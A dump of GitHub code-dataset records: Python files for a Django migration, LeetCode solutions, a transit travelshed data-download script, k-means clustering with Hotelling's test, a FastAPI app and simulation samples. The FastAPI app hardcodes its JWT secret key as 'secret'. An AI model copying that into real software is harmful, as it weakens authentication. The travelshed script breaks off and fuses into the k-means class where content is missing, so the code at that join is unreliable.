apps.get_model('hpc', 'Session')\n Session.objects.filter(name=\"البرنامج العام وبرنامج الأبحاث\").update(time_slot=None, code_name='main')\n Session.objects.filter(name=\"ورشة عمل: تجربة اختبار SMLE\").update(code_name='smle')\n Session.objects.create(name=\"محاضرة ECG\",\n time_slot=4,\n vma_id=0)\n Session.objects.create(name=\"محاضرة Antibiotics\",\n time_slot=4,\n vma_id=0)\n Session.objects.create(name=\"جلسة المجموعات العلاجية\",\n time_slot=None,\n code_name='therapy',\n vma_id=0,\n gender='F')\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('hpc', '0009_add_missing_fields'),\n ]\n\n operations = [\n migrations.RunPython(\n add_sessions),\n ]\n","repo_name":"enjaz/enjaz","sub_path":"hpc/migrations/0010_add_more_hpc_sessions.py","file_name":"0010_add_more_hpc_sessions.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"ar","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"}{"seq_id":"35414702272","text":"\"\"\"\nThis file does not need to define any classes.\nCommand-line interface:\ncreates and runs a Task.\n\"\"\"\nfrom tasks import NextLocPred\nimport sys\nimport json\n\nif __name__ == \"__main__\":\n # Wiring this into shell scripts and the overall design are left to others; this only gives an example of invoking a task.\n if len(sys.argv) != 4:\n print('wrong format parameters!', file=sys.stderr)\n exit(1)\n model_name = sys.argv[1] # deepMove / SimpleRNN / FPMC\n dataset_name = sys.argv[2]\n pre_name = sys.argv[3]\n config_file = open('./global_config.json', 'r')\n global_config = json.load(config_file)\n config_file.close()\n task = NextLocPred(config=global_config['task'])\n task.run(model_name=model_name, pre_name=pre_name, dataset_name=dataset_name, train=True)\n","repo_name":"shh2000/Bigscity-Human-Mobility-Prediction-Toolkit","sub_path":"shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}{"seq_id":"44093242072","text":"class Solution:\n def is_parlidrome(self, l, r, sub_s):\n left = 0\n right = len(sub_s) - 1\n while (left < right):\n if sub_s[left] != sub_s[right]:\n return False\n left += 1\n right -= 1\n return True\n def verison1(self, s):\n s = list(s)\n l = 0\n r = len(s) - 1\n while l < r:\n if s[l] != s[r]:\n break\n l += 1\n r -= 1\n if (l >= r):\n return True\n elif self.is_parlidrome(l + 1, r, s[l + 1 : r + 1]) or self.is_parlidrome(l, r - 1, s[l: r]):\n return True\n return False \n\n def version2(self, s):\n left = 0\n right = len(s) - 1\n \n while left < right:\n if s[left] != s[right]:\n one = s[left:right]\n two = s[left+1:right+1]\n return one == one[::-1] or two == two[::-1]\n left += 1\n right -= 1 \ndef main():\n s = \"abc\"\n print(Solution().verison1(s))\nmain()","repo_name":"Luwei-Lin/LeetCode","sub_path":"LC/Python/LC0680_valid_palindrome.py","file_name":"LC0680_valid_palindrome.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"24430557861","text":"#!/usr/bin/env python3\n\n#\n# UnboundLocalError: local variable 'result' referenced before assignment\n#\n# it happens only inside a function/method\n#\n\nimport traceback\n\ndef example1():\n print(result)\n result = 5\n \ndef example2a():\n result += 5\n \ndef example2b():\n result = result + 5\n \ndef example3():\n '''\n - to create the variable `result` you have to assign a value,\n - to get that value you have to calculate `1/0`\n - but that raises the exception \"division by zero\"\n - so it can't produce a value that could be used to create the variable `result`\n - so it doesn't create the 
variable\n - but later it tries to use it - print it\n - and it gives error \"UnboundLocalError: local variable 'result' referenced before assignment\"\n '''\n \n try:\n result = 1/0\n except Exception as ex:\n print(ex)\n print(result)\n\ndef example4():\n if False:\n result = 5\n print(result)\n\n#----------------------------------------------------------------------\n\nexamples = [example1, example2a, example2b, example3, example4]\n\n\nfor function in examples:\n print('\\n===== Example:', function.__name__, '=====')\n try:\n function()\n #except:\n #except Exception as ex:\n except UnboundLocalError as ex:\n print('\\nException:', ex)\n print('\\n---\\n')\n traceback.print_exc()\n","repo_name":"furas/python-examples","sub_path":"__ERRORS__/UnboundLocalError - local variable referenced before assignment/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":167,"dataset":"github-code","pt":"79"} +{"seq_id":"42432855781","text":"class RandomizedCollection:\n def __init__(self):\n self.d = collections.defaultdict(set)\n self.v = []\n\n def insert(self, val: int) -> bool:\n self.d[val].add(len(self.v))\n self.v.append(val)\n return True if len(self.d[val]) == 1 else False\n\n def remove(self, val: int) -> bool:\n if not self.d[val]:\n return False\n select_idx = self.d[val].pop()\n repalce_val = self.v[-1]\n repalce_idx = len(self.v) - 1\n self.d[repalce_val].add(select_idx)\n self.d[repalce_val].discard(repalce_idx)\n self.v[select_idx] = repalce_val\n self.v.pop()\n return True\n\n def getRandom(self) -> int:\n return random.choice(self.v)\n","repo_name":"lih627/python-algorithm-templates","sub_path":"LeetCodeSolutions/LeetCode_0381.py","file_name":"LeetCode_0381.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"79"} +{"seq_id":"13482198846","text":"import unittest\n\n\nclass TestSolution(unittest.TestCase):\n\n def setUp(self) -> None:\n self.solution = Solution()\n\n def test_givenNormal_when_thenSuccess(self):\n panama = \"A man, a plan, a canal: Panama\"\n is_palindrome = self.solution.isPalindrome(panama)\n self.assertTrue(is_palindrome)\n not_palindrome = self.solution.isPalindrome(\"race a car\")\n self.assertFalse(not_palindrome)\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def isPalindrome(self, s: str) -> bool:\n ans = True\n left, right = 0, len(s) - 1\n while left < right:\n if not s[left].isalnum():\n left += 1\n continue\n if not s[right].isalnum():\n right -= 1\n continue\n if s[left].lower() != s[right].lower():\n ans = False\n break\n # move pointer\n left, right = left + 1, right - 1\n return ans\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"zhang-zzf/leetcode","sub_path":"leetcode/editor/cn/125_验证回文串_test.py","file_name":"125_验证回文串_test.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3856101091","text":"# Travelshed Mapping\n# OpenTripPlanner Guide: http://docs.opentripplanner.org/en/latest/\n# OpenTripPlanner API Doc: http://dev.opentripplanner.org/apidoc/1.0.0/index.html\n\nimport urllib\nimport requests\nimport zipfile\nimport io\nimport geopandas as gpd\nimport pandas as pd\nimport shapely\nimport datetime\n\n# Create project folder\ntvsenv='C:/Users/Yijun 
Ma/Desktop/travelshedrevamp'\notpenv=tvsenv+'/otp12'\nshpenv=tvsenv+'/quadstate'\n\n\n\n# Download OpenTripPlanner jar file\n# Double check the update before downloading: https://repo1.maven.org/maven2/org/opentripplanner/otp/\nurl='https://repo1.maven.org/maven2/org/opentripplanner/otp/1.2.0/otp-1.2.0-shaded.jar'\nurllib.request.urlretrieve(url,otpenv+'/otp-1.2.0-shaded.jar')\n\n\n\n\n\n\n# Download OpenStreetMap pbf file from geofabrik\n# New York\nurl='https://download.geofabrik.de/north-america/us/new-york-latest.osm.pbf'\nurllib.request.urlretrieve(url,otpenv+'/newyork.osm.pbf')\n# New Jersey\nurl='https://download.geofabrik.de/north-america/us/new-jersey-latest.osm.pbf'\nurllib.request.urlretrieve(url,otpenv+'/newjersey.osm.pbf')\n# Connecticut\nurl='https://download.geofabrik.de/north-america/us/connecticut-latest.osm.pbf'\nurllib.request.urlretrieve(url,otpenv+'/connecticut.osm.pbf')\n# Pennsylvania\nurl='https://download.geofabrik.de/north-america/us/pennsylvania-latest.osm.pbf'\nurllib.request.urlretrieve(url,otpenv+'/pennsylvania.osm.pbf')\n\n\n\n# Download GTFS data\n# New York\n# MTA NYCT Subway\nurl='http://web.mta.info/developers/data/nyct/subway/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtanyctsubway.zip')\n# MTA NYCT Bus Bronx\nurl='http://web.mta.info/developers/data/nyct/bus/google_transit_bronx.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtanyctbusbronx.zip')\n# MTA NYCT Bus Brooklyn\nurl='http://web.mta.info/developers/data/nyct/bus/google_transit_brooklyn.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtanyctbusbrooklyn.zip')\n# MTA NYCT Bus Manhattan\nurl='http://web.mta.info/developers/data/nyct/bus/google_transit_manhattan.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtanyctbusmanhattan.zip')\n# MTA NYCT Bus Queens\nurl='http://web.mta.info/developers/data/nyct/bus/google_transit_queens.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtanyctbusqueens.zip')\n# MTA NYCT Bus Staten Island\nurl='http://web.mta.info/developers/data/nyct/bus/google_transit_staten_island.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtanyctbusstatenisland.zip')\n# MTA Bus Company\nurl='http://web.mta.info/developers/data/busco/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtabusco.zip')\n# MTA long Island Railroad\nurl='http://web.mta.info/developers/data/lirr/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtalirr.zip')\n# MTA Metro-North Railroad\nurl='http://web.mta.info/developers/data/mnr/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtamnr.zip')\n# Port Authority Trans-Hudson\nurl='http://data.trilliumtransit.com/gtfs/path-nj-us/path-nj-us.zip'\nurllib.request.urlretrieve(url,otpenv+'/path.zip')\n# JFK AirTrain (manually download the 7 April 2015 version and change the calendar)\nprint('https://transitfeeds.com/p/jfk-airtrain/433')\n# NYC DOT Staten Island Ferry\nurl='http://www.nyc.gov/html/dot/downloads/misc/siferry-gtfs.zip'\nurllib.request.urlretrieve(url,otpenv+'/nycdotsiferry.zip')\n# NYC Ferry\nurl='http://nycferry.connexionz.net/rtt/public/utility/gtfs.aspx?google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/nycferry.zip')\n# NY Waterway\nurl='https://s3.amazonaws.com/data.bytemark.co/nywaterway/nywaterway.zip'\nurllib.request.urlretrieve(url,otpenv+'/nywaterway.zip')\n# Seastreak (manually download the file due to certificate issue)\nprint('http://seastreak.com/api/transit/google_transit.zip')\n# NYC Downtown 
Alliance\nurl='http://mjcaction.com/MJC_GTFS_Public/downtown_nyc_google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/downtownalliance.zip')\n# Nassau Inter-County Express Bus (manually download the file for the most up to date version)\nprint('http://www.nicebus.com/Passenger-Information/App-Developers.aspx')\n# Suffolk County Transit (http://www.suffolkcountyny.gov/Departments/PublicWorks/Transportation/GeneralTransitFeedSpecificationGTFSDetails.aspx)\nurl='http://www.suffolkcountyny.gov/portals/0/publicworks/zip/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/suffolk.zip')\n# Westchester County Bee-Line System (NYS511: https://511ny.org/developers/resources)\nurl='https://s3.amazonaws.com/datatools-nysdot/public/Westchester_County_Bee-Line_System.zip'\nurllib.request.urlretrieve(url,otpenv+'/beeline.zip')\n# TappanZee Express (Rockland TZX; NYS511: https://511ny.org/developers/resources)\nurl='https://s3.amazonaws.com/datatools-nysdot/public/TappanZee_Express.zip'\nurllib.request.urlretrieve(url,otpenv+'/tzx.zip')\n# Ulster County Area Transit (NYS511: https://511ny.org/developers/resources)\nurl='https://s3.amazonaws.com/datatools-nysdot/public/UCAT_Ulster_County_Area_Transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/ucat.zip')\n# Capital District Transportation Authority\nurl='http://www.cdta.org/schedules/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/cdta.zip')\n# Rochester-Genesee Regional Transportation Authority (NYS511: https://511ny.org/developers/resources)\nurl='http://scheduledata.rgrta.com/google_transit_merged.zip'\nurllib.request.urlretrieve(url,otpenv+'/rgrta.zip')\n# Niagara Frontier Transportation Authority\nurl='http://www.nfta.com/metro/__googletransit/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/nfta.zip')\n\n# New Jersey\n# New Jersey Transit (manually download the file; need to log in)\nprint('https://www.njtransit.com/mt/mt_servlet.srv?hdnPageAction=MTDevResourceDownloadTo&Category=rail')\nprint('https://www.njtransit.com/mt/mt_servlet.srv?hdnPageAction=MTDevResourceDownloadTo&Category=bus')\n\n# Connecticut\n# Connecticut Transit Hartford-New Haven-New Britain-Waterbury-Meriden\nurl='https://www.cttransit.com/sites/default/files/gtfs/googlect_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/cthfnhnbwbmd.zip')\n# Connecticut Transit Stamford\nurl='https://www.cttransit.com/sites/default/files/gtfs/googlestam_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/ctstam.zip')\n# Shore Line East\nurl='http://www.shorelineeast.com/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/sle.zip')\n# 9 Town Transit\nurl='http://data.trilliumtransit.com/gtfs/ninetown-connecticut-us/ninetown-connecticut-us.zip'\nurllib.request.urlretrieve(url,otpenv+'/9town.zip')\n# Norwalk Transit District\nurl='https://www.norwalktransit.com/s/GTFS_Data.zip'\nurllib.request.urlretrieve(url,otpenv+'/norwalk.zip')\n\n# Pennsylvania\n# Port Authority Transit Corporation\nurl='http://www.ridepatco.org/developers/PortAuthorityTransitCorporation.zip'\nurllib.request.urlretrieve(url,otpenv+'/patco.zip')\n# Southeastern Pennsylvania Transportation Authority (manually download the file and separate bus and rail)\nprint('http://www3.septa.org/') # Media=>Developer=>GTFS=>github\n# Monroe County Transit Authority (Pocono Pony)\nurl='https://www.gomcta.com/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/pocono.zip')\n# Rabbit 
Transit\nurl='http://www.rabbittransit.org/infopoint/gtfs/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/rabbit.zip')\n# Centre County Transit Authority (CATA)\nurl='https://catabus.com/data/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/cata.zip')\n# Port Authority of Allegheny County\nurl='http://www.portauthority.org/GeneralTransitFeed/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/paac.zip')\n# Erie Metropolitan Transit Authority (EMTA) (manually download the file for the most up to date version)\nprint('http://www.ride-the-e.com/wp-content/uploads/2017/09/EMTA_GTFS.zip')\n\n# Rhode Island (manually download the file for the most up to date version)\n# Rhode Island Public Transit Authority (RIPTA)\nprint('https://www.ripta.com/mobile-applications')\n\n# Delaware\n# Delaware Transit Corporation (DART)\nurl='https://dartfirststate.com/information/routes/gtfs_data/dartfirststate_de_us.zip'\nurllib.request.urlretrieve(url,otpenv+'/dart.zip')\n\n# Amtrak (transitland FOIA)\nurl='http://github.com/transitland/gtfs-archives-not-hosted-elsewhere/raw/master/amtrak.zip'\nurllib.request.urlretrieve(url,otpenv+'/amtrak.zip')\n\n# Problematic feeds\n# Centro (NYS511: https://511ny.org/developers/resources)\nprint('https://www.centro.org/CentroGTFS/CentroGTFS.zip')\n# Lehigh and Northampton Transportation Authority (LANTA)\nprint('https://github.com/LANTA-Transportation-Authority/GTFS-data/raw/master/lanta_gtfs_feed.zip')\n\n\n\n# Download Census Block shapefiles and convert to centorids\n# New York\nurl='ftp://ftp2.census.gov/geo/tiger/TIGER2017/TABBLOCK/tl_2017_36_tabblock10.zip'\nurllib.request.urlretrieve(url,tvsenv+'/newyorkblock.zip')\nzip_ref=zipfile.ZipFile(tvsenv+'/newyorkblock.zip','r')\nzip_ref.extractall(tvsenv+'/newyorkblock')\nzip_ref.close()\n# New Jersey\nurl='ftp://ftp2.census.gov/geo/tiger/TIGER2017/TABBLOCK/tl_2017_34_tabblock10.zip'\nurllib.request.urlretrieve(url,tvsenv+'/newjerseyblock.zip')\nzip_ref=zipfile.ZipFile(tvsenv+'/newjerseyblock.zip','r')\nzip_ref.extractall(tvsenv+'/newjerseyblock')\nzip_ref.close()\n# Connecticut\nurl='ftp://ftp2.census.gov/geo/tiger/TIGER2017/TABBLOCK/tl_2017_09_tabblock10.zip'\nurllib.request.urlretrieve(url,tvsenv+'/connecticutblock.zip')\nzip_ref=zipfile.ZipFile(tvsenv+'/connecticutblock.zip','r')\nzip_ref.extractall(tvsenv+'/connecticutblock')\nzip_ref.close()\n# Pennsylvania\nurl='ftp://ftp2.census.gov/geo/tiger/TIGER2017/TABBLOCK/tl_2017_42_tabblock10.zip'\nurllib.request.urlretrieve(url,tvsenv+'/pennsylvaniablock.zip')\nzip_ref=zipfile.ZipFile(tvsenv+'/pennsylvaniablock.zip','r')\nzip_ref.extractall(tvsenv+'/pennsylvaniablock')\nzip_ref.close()\n# Merge shapefiles\nny=gpd.read_file(tvsenv+'/newyorkblock/tl_2017_36_tabblock10.shp')\nnj=gpd.read_file(tvsenv+'/newjerseyblock/tl_2017_34_tabblock10.shp')\nct=gpd.read_file(tvsenv+'/connecticutblock/tl_2017_09_tabblock10.shp')\npa=gpd.read_file(tvsenv+'/pennsylvaniablock/tl_2017_42_tabblock10.shp')\nbk=gpd.GeoDataFrame()\nbk=bk.append(ny,ignore_index=True)\nbk=bk.append(nj,ignore_index=True)\nbk=bk.append(ct,ignore_index=True)\nbk=bk.append(pa,ignore_index=True)\nbk.to_file(filename=shpenv+'/quadstateblock.shp',driver='ESRI Shapefile') # crs: 4269\nbkpt=bk\nbkpt['LAT']=pd.to_numeric(bkpt['INTPTLAT10'])\nbkpt['LONG']=pd.to_numeric(bkpt['INTPTLON10'])\nbkpt=bkpt[['GEOID10','LAT','LONG']]\nbkpt=gpd.GeoDataFrame(bkpt,crs={'init': 'epsg:4326'},geometry=[shapely.geometry.Point(xy) for xy in zip(bkpt.LONG, 
bkpt.LAT)])\nbkpt.to_file(filename=shpenv+'/quadstateblockpoint.shp',driver='ESRI Shapefile')\n\n\n\n\n# Set up OpenTripPlanner in cmd\nprint('java -Xmx8G -jar \"'+otpenv+'/otp-1.2.0-shaded.jar\" --build \"'+otpenv+'\" --inMemory --analyst --port 8801 --securePort 8802')\n\n\nprint(datetime.datetime.now())\n# Create travelshed table\n# Set destination\ndestination='40.684913,-73.978065'\n\n# Set typical day\ntypicaldate='2018/06/06'\n\n# Create arrival time list\narrivaltimeinterval=5 # in minutes\narrivaltimestart='07:00:00'\narrivaltimeend='10:00:00'\narrivaltimestart=datetime.datetime.strptime(arrivaltimestart,'%H:%M:%S')\narrivaltimeend=datetime.datetime.strptime(arrivaltimeend,'%H:%M:%S')\narrivaltimeincrement=arrivaltimestart\narrivaltime=[]\nwhile arrivaltimeincrement<=arrivaltimeend:\n arrivaltime.append(datetime.datetime.strftime(arrivaltimeincrement,'%H:%M:%S'))\n arrivaltimeincrement+=datetime.timedelta(seconds=arrivaltimeinterval*60)\n\n# Set maximum number of transfers\nmaxTransfers=3 # 4 boardings\n\n# Set maximum walking distance\nmaxWalkDistance=805 # in meters\n\n# Set maximum pre transit free flow driving time\nmaxPreTransitTime=5 # in minutes\n\n# Set cut off points between 0-120 mins\ncutoffinterval=2 # in minutes\ncutoffstart=0\ncutoffend=120\ncutoffincrement=cutoffstart\ncutoff=''\nwhile cutoffincrement cnvrgPct: \n scatterPrev = self.scatter\n self.Update()\n \n if self.scatter < minScatter:\n minScatter = self.scatter\n minMus = self.mus.copy()\n self.minClusters = self.clstr.copy()\n \n # We return the centroid values re-calculated for the non-normalized data using the final cluster assignments.\n self.finalMus = np.zeros((self.k,self.nDim))\n for ik in range(self.k):\n self.finalMus[ik,:] = self.tbl.loc[self.minClusters.id == ik,:].mean(axis=0) \n \n return (self.finalMus,self.minClusters.id,self.CalcPValues(minMus, self.minClusters))\n \n \n \n # Uses Hotelling's test to determine if the differences between cluster centroids\n # are statistically significant.\n # Reference: https://en.wikipedia.org/wiki/Hotelling%27s_T-squared_distribution#Two-sample_statistic\n def CalcPValues(self,mus,clstr):\n \n nComp = scisp.comb(self.k,2,exact=True) # Number of comparisons between centroids.\n pTable = pd.DataFrame({ \n 'i': [0]*nComp, 'j': [0]*nComp, # Indices to represent the centroids being compared.\n 'pVal': [0]*nComp # p-value indicating statistical significance.\n })\n \n pInd = 0\n p = self.nDim\n for i in range(self.k):\n for j in range(i+1,self.k):\n \n # Number of data samples in cluster groups i and j.\n iN = sum(clstr.id==i) \n jN = sum(clstr.id==j)\n \n # Covariance matrices of the data in the two cluster groups.\n iCov = np.cov(self.dat.loc[clstr.id==i,:],rowvar=False)\n jCov = np.cov(self.dat.loc[clstr.id==j,:],rowvar=False)\n \n # Inverse of the pooled covariance matrix estimate\n invCov = np.linalg.inv( ((iN-1)*iCov+(jN-1)*jCov)/(iN+jN-1) )\n \n # Hotelling's two sample test statistic (analagous to the difference between two normalized means in the t-test).\n t2Val = iN*jN/(iN+jN) * (mus[i,:]-mus[j,:]).T @ invCov @ (mus[i,:]-mus[j,:])\n \n # Hotelling's distribution can be approximated by the f-distribution if scaled as follows.\n # - Important since scipy has a CDF for the f-distribution but not one for the Hotelling's distribution.\n fVal = t2Val * (iN+jN-p-1)/((iN+jN-2)*p)\n \n pTable.loc[pInd,'i'] = i\n pTable.loc[pInd,'j'] = j\n \n # Determine p-val (probability the difference between the two means was due to standard sampling error).\n 
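# NOTE (illustrative, not part of the captured module): scist.f.cdf below
# appears to be scipy.stats.f.cdf. Under the null hypothesis the scaled
# statistic fVal follows an F(p, iN+jN-1-p) distribution, so 1 - CDF(fVal) is
# the probability that a centroid difference at least this large arises from
# sampling error alone; that survival probability is stored as the p-value.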
pTable.loc[pInd,'pVal'] = 1-scist.f.cdf(fVal,p,iN+jN-1-p) \n\n pInd += 1\n \n return pTable\n \n # Visualization routine for the centroids and cluster groups. \n def Visualize(self): \n \n if self.nDim != 2:\n print('ERROR: KMeansCluster::Visualize() only works with 2D data.')\n return\n\n try:\n self.finalMus\n except NameError:\n print('ERROR: Need to call KMeansCluster::Solve() before KMeansCluster::Visualize()')\n return\n else:\n xColIdx = [ True, False ]\n yColIdx = [ False, True ]\n \n for ik in range(self.k):\n rowIdx = (self.minClusters.id == ik) \n plt.plot(self.tbl.loc[rowIdx,xColIdx],self.tbl.loc[rowIdx,yColIdx],'o')\n\n plt.plot(self.finalMus[:,0],self.finalMus[:,1],'ko',markersize = 15)\n plt.show()\n \n \nif __name__ == '__main__':\n \n nDat = 10000\n muOffset = 5\n\n # Two clearly separated Gaussian distributed datasets.\n # - An example of finding two actual clusters of data.\n tbl1 = pd.DataFrame({ 'x': np.random.randn(nDat), 'y': np.random.randn(nDat) })\n tbl1.iloc[::2] += muOffset\n\n clusters = KMeansCluster(2,tbl1)\n (clstrMus,clstrAsgn,pTable) = clusters.Solve(10,0.001)\n \n print('-- Gaussian Example Data --')\n print('Centroids:')\n print(clstrMus)\n print('Hotelling\\'s Test Results:')\n print(pTable)\n print('')\n clusters.Visualize()\n\n\n # A uniformly distributed dataset around a circular area.\n # - An example of finding the Voronoi tesselation for uniform data.\n tbl2 = pd.DataFrame({ 'x': np.random.rand(nDat), 'y': np.random.rand(nDat) })\n tbl2 = tbl2[ np.sqrt(tbl2.x**2 + tbl2.y**2) < 1]\n \n clusters = KMeansCluster(3,tbl2)\n (clstrMus,clstrAsgn,pTable) = clusters.Solve(10,0.001)\n \n print('-- Uniform Example Data --')\n print('Centroids:')\n print(clstrMus)\n print('Hotelling\\'s Test Results:')\n print(pTable)\n print('')\n clusters.Visualize()\n\n \n # Verify the Hotelling's test routine by doing a p-value test for data that really is\n # different based only on sampling error.\n \n clusters.dat = pd.DataFrame({ 'x': np.random.randn(nDat), 'y': np.random.randn(nDat) })\n clusters.k = 2\n randClstr = pd.DataFrame({ 'id': np.random.randint(2,size=nDat) }) # Randomly assign clusters.\n mus = np.array([ \n list(clusters.dat.loc[randClstr.id == 0,:].mean(axis=0)),\n list(clusters.dat.loc[randClstr.id == 1,:].mean(axis=0))\n ])\n \n print('-- Hotelling\\'s Test for Random Sampling Error Only --')\n print('Centroids:')\n print(mus) \n print('Hotelling\\'s Test Results:')\n print(clusters.CalcPValues(mus, randClstr))\n print('Typically we reject any p-value larger than 0.05.')\n \n \n \n \n","repo_name":"ggmessier/data-analytics","sub_path":"pubs/RAPID Tests/KMeansCluster.py","file_name":"KMeansCluster.py","file_ext":"py","file_size_in_byte":9624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42072503309","text":"from utils import Statuses,Logg,ProjectUtils\nfrom fastapi import FastAPI, Request\nfrom fastapi.responses import JSONResponse\nfrom fastapi_jwt_auth import AuthJWT\nfrom fastapi_jwt_auth.exceptions import AuthJWTException\nfrom pydantic import BaseModel\nfrom routers import users,views\nfrom fastapi.openapi.utils import get_openapi\n\napp=FastAPI()\nLogg().logSetup()\n\nclass Settings(BaseModel):\n authjwt_secret_key: str = \"secret\"\n\n@AuthJWT.load_config\ndef get_config():\n return Settings()\n\n@app.exception_handler(AuthJWTException)\ndef authjwt_exception_handler(request: Request, exc: AuthJWTException):\n return JSONResponse(\n status_code=exc.status_code,\n 
content={\"detail\": exc.message}\n )\n \ndef custom_openapi():\n if app.openapi_schema:\n return app.openapi_schema\n openapi_schema = get_openapi(\n title=\"Custom title\",\n version=\"2.5.0\",\n description=\"This is a very custom OpenAPI schema\",\n routes=app.routes,\n )\n openapi_schema[\"info\"][\"x-logo\"] = {\n \"url\": \"https://fastapi.tiangolo.com/img/logo-margin/logo-teal.png\"\n }\n app.openapi_schema = openapi_schema\n return app.openapi_schema\n\n@app.middleware(\"http\")\nasync def log_request(request, call_next):\n response = await call_next(request)\n ProjectUtils.print_log_msg(f'{request.method} {request.url} '+f'Status code: {response.status_code}',logger=\"SERVER\")\n return response\n\napp.include_router(users.router,tags=['users'])\napp.include_router(views.router,tags=['views'])\n\n\n","repo_name":"rayalajeevan/product-catalog","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42076352698","text":"from gwe_fishdata import FishData\nimport matplotlib.pyplot as plt\n\nfdata = FishData()\n\nbream = fdata.getSpecies('Bream')\nsmelt = fdata.getSpecies('Smelt')\nbr, bd = fdata.getFeatures(bream, 'Weight', 'Length2')\nsr, sd = fdata.getFeatures(smelt, 'Weight', 'Length2')\nplt.scatter(bd[:,1], bd[:,0])\nplt.scatter(sd[:,1], sd[:,0])\nplt.xlabel('Length')\nplt.ylabel('Weight')\nplt.title('Length & Weight')\nplt.legend(['bream', 'smelt'])\n'''\n\nfor f in fdata.species[1:3]:\n temp = fdata.getSpecies(f)\n tr, td = fdata.getFeatures(temp, 'Weight', 'Length2')\n plt.scatter(td[:,1], td[:,0])\nplt.xlabel('Length')\nplt.ylabel('Weight')\nplt.title('Length & Weight')\nplt.legend(fdata.species[1:3])\n'''\nplt.show()\n","repo_name":"chuncmsTeacher/gwe_basic_ml","sub_path":"00_gwe_scatter_bream_smelt.py","file_name":"00_gwe_scatter_bream_smelt.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25497605536","text":"import espressomd\nimport espressomd.interactions\nimport espressomd.visualization\nimport numpy as np\n\nrequired_features = [\"LENNARD_JONES\"]\nespressomd.assert_features(required_features)\n\nbox_l = 50\nn_part = 200\n\nsystem = espressomd.System(box_l=[box_l] * 3)\nnp.random.seed(seed=42)\n\nsystem.time_step = 0.01\nsystem.cell_system.skin = 0.4\n\nsystem.non_bonded_inter[0, 0].lennard_jones.set_params(\n epsilon=0, sigma=1, cutoff=2, shift=\"auto\")\nsystem.bonded_inter[0] = espressomd.interactions.HarmonicBond(k=0.5, r_0=1.0)\n\nprevious_part = None\nfor i in range(n_part):\n part = system.part.add(pos=np.random.random(3) * system.box_l)\n if previous_part:\n part.add_bond((system.bonded_inter[0], previous_part))\n previous_part = part\n\nvisualizer = espressomd.visualization.openGLLive(\n system, bond_type_radius=[0.3])\n\nsystem.integrator.set_steepest_descent(f_max=10, gamma=50.0,\n max_displacement=0.2)\nsystem.integrator.run(1000)\nsystem.integrator.set_vv()\n\nsystem.thermostat.set_langevin(kT=0.1, gamma=20.0, seed=42)\n\nvisualizer.run(1)\n","repo_name":"espressomd/espresso","sub_path":"samples/visualization_bonded.py","file_name":"visualization_bonded.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"79"} +{"seq_id":"17848138784","text":"from typing import List, Tuple\n\n\ndef parse_input(filename: str) -> List[Tuple[int, 
int, int]]:\n discs = []\n lines = [line.strip().split() for line in open(filename).readlines()]\n for line in lines:\n disc = (int(line[1][1:]), int(line[3]), int(line[11][:-1]))\n discs.append(disc)\n return discs\n\n\ndef disc_in_position(disc: Tuple[int, int, int], time) -> bool:\n disc_num, positions, position = disc\n return (disc_num + position + time) % positions == 0\n\n\ndef falls_through(discs: List[Tuple[int, int, int]], time: int) -> bool:\n for disc in discs:\n if not disc_in_position(disc, time):\n return False\n return True\n\n\ndef part1(discs: List[Tuple[int, int, int]]) -> int:\n time = 0\n while True:\n time += 1\n if falls_through(discs, time):\n return time\n\n\ndef main():\n discs = parse_input('input/day15.txt')\n print(f'Part 1: {part1(discs)}')\n discs.append((7, 11, 0))\n print(f'Part 2: {part1(discs)}')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TessFerrandez/AdventOfCode-Python","sub_path":"2016/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"3711169198","text":"def 